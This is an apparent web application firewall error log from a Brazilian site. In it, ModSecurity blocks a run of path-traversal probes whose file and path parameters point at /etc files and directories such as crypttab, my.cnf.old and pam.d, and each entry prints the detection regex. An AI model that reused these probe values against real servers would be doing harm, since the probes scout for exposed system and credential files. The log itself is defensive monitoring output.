[Fri Mar 20 11:31:48.393174 2026] [:error] [pid 11167:tid 140411674785536] [client 216.73.216.191:42146] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aVPHIg5MgXLBnicMjpQAAAcg"]
[Fri Mar 20 11:31:48.777418 2026] [:error] [pid 7893:tid 140411641214720] [client 216.73.216.191:42170] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aVBCii7xarUs8iHaYEgAAAgw"]
[Fri Mar 20 11:31:49.118362 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:42198] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aVeoXxyEfFpUF8f-tswAAAUw"]
[Fri Mar 20 11:31:54.315042 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.123:42468] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1aWvqxLDW4GITHUkQX_gAAARE"]
[Fri Mar 20 11:31:54.831509 2026] [:error] [pid 11167:tid 140411683178240] [client 57.141.18.56:42500] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1aWvHIg5MgXLBnicMjqAAAAcc"]
[Fri Mar 20 11:31:57.945611 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:42682] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aXbninkcc-iUj5AqKugAAA5Y"]
[Fri Mar 20 11:31:58.307211 2026] [:error] [pid 21219:tid 140411649607424] [client 216.73.216.191:42648] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aXvXLqtnMIWvjpaLI0AAAAos"]
[Fri Mar 20 11:31:58.380993 2026] [:error] [pid 9818:tid 140411708356352] [client 216.73.216.191:42702] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aXl1pVZ5mVmJwsFNcggAAAEQ"]
[Fri Mar 20 11:31:58.593152 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:42662] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aXvXLqtnMIWvjpaLI0QAAAok"]
[Fri Mar 20 11:31:59.604086 2026] [:error] [pid 26799:tid 140411683178240] [client 216.73.216.191:42774] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aX9a6ubjKNq_cu4YJVgAAA0c"]
[Fri Mar 20 11:32:00.836433 2026] [:error] [pid 10189:tid 140411691570944] [client 216.73.216.191:42858] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aYDJ3M9BSuKP7CAZVJAAAAIY"]
[Fri Mar 20 11:32:01.121333 2026] [:error] [pid 21219:tid 140411691570944] [client 216.73.216.191:42874] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aYfXLqtnMIWvjpaLI1QAAAoY"]
[Fri Mar 20 11:32:01.203701 2026] [:error] [pid 11167:tid 140411574073088] [client 216.73.216.191:42880] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aYfHIg5MgXLBnicMjrwAAAdQ"]
[Fri Mar 20 11:32:12.660382 2026] [:error] [pid 11642:tid 140411666392832] [client 216.73.216.191:43298] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abLninkcc-iUj5AqKwQAAA4k"]
[Fri Mar 20 11:32:13.079537 2026] [:error] [pid 9818:tid 140411590858496] [client 216.73.216.191:43328] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abV1pVZ5mVmJwsFNchwAAAFI"]
[Fri Mar 20 11:32:13.291030 2026] [:error] [pid 31215:tid 140411741927168] [client 216.73.216.191:43346] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abQF0L0L-SsrnPo6XKAAAAsA"]
[Fri Mar 20 11:32:13.483809 2026] [:error] [pid 11167:tid 140411548894976] [client 216.73.216.191:43360] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abfHIg5MgXLBnicMjvAAAAdc"]
[Fri Mar 20 11:32:13.727344 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:43378] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abfqxLDW4GITHUkQYDwAAAQI"]
[Fri Mar 20 11:32:14.574265 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:43428] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abvXLqtnMIWvjpaLI3wAAAok"]
[Fri Mar 20 11:32:14.623836 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:43384] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abl1pVZ5mVmJwsFNcigAAAEE"]
[Fri Mar 20 11:32:14.822137 2026] [:error] [pid 7235:tid 140411616036608] [client 216.73.216.191:43438] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abvqxLDW4GITHUkQYEAAAAQ8"]
[Fri Mar 20 11:32:14.932767 2026] [:error] [pid 9818:tid 140411683178240] [client 216.73.216.191:43450] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1abl1pVZ5mVmJwsFNciwAAAEc"]
[Fri Mar 20 11:32:15.030079 2026] [:error] [pid 21219:tid 140411699963648] [client 216.73.216.191:43458] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ab_XLqtnMIWvjpaLI4AAAAoU"]
[Fri Mar 20 11:32:15.252228 2026] [:error] [pid 11642:tid 140411632822016] [client 216.73.216.191:43412] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ab7ninkcc-iUj5AqKxQAAA40"]
[Fri Mar 20 11:32:15.628251 2026] [:error] [pid 21219:tid 140411716749056] [client 216.73.216.191:43496] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ab_XLqtnMIWvjpaLI4QAAAoM"]
[Fri Mar 20 11:32:15.850226 2026] [:error] [pid 9818:tid 140411708356352] [client 216.73.216.191:43510] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ab11pVZ5mVmJwsFNcjQAAAEQ"]
[Fri Mar 20 11:32:16.050997 2026] [:error] [pid 15826:tid 140411540502272] [client 216.73.216.191:43518] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acOoXxyEfFpUF8f-tvwAAAVg"]
[Fri Mar 20 11:32:16.368758 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:43488] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acLninkcc-iUj5AqKyQAAA5Y"]
[Fri Mar 20 11:32:16.653490 2026] [:error] [pid 7893:tid 140411733534464] [client 216.73.216.191:43558] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acBCii7xarUs8iHaYRQAAAgE"]
[Fri Mar 20 11:32:16.767111 2026] [:error] [pid 21219:tid 140411674785536] [client 216.73.216.191:43566] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] 